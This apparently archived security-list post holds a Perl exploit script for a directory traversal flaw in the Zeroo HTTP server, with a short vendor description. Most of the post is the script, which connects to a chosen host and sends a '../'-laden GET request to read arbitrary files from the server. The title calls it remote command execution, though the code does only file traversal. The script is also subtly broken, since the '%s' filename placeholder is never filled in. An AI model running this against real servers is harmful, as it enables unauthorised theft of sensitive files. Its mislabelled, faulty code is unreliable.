Zeroo HTTPd server remote command execution exploit. Based on advisory by InetCop.
5fe342e390df430cbaf5f6ff02493e0c6a4b87aee4b723dd0bd56fe633aef058
According to the vendor's web page <http://lonerunner.cfxweb.net>, Zeroo is
a "simple, small, portable, fast HTTP server". The server is available for
Windows, and Linux operating systems.
A folder traversal flaw in the server may allow attackers to compromise
sensitive information stored on the server's volume.
#!/usr/bin/perl
use IO::Socket;
$pkt = "GET /../../../../../../../../../../../../../../../../../../../../%s
HTTP/1.0\r\n\r\n";
if (@ARGV < 2 || @ARGV > 3) {
print STDOUT "Usage: perl $0 [filename] [host] [port=80]";
exit;
}
if (@ARGV==3) {
$port=$ARGV[2];
} else {
$port=80;
}
$f = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$ARGV[1],PeerPort=>$port);
if (!defined($f)) {
$err=sprintf("Cannot connect to %s on port %d",$ARGV[1],$port);
print STDOUT $err;
exit;
}
$f->autoflush(1);
print $f $pkt;
while (defined($line = <$f>)) {
print STDOUT $line;
}
undef $f;
--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .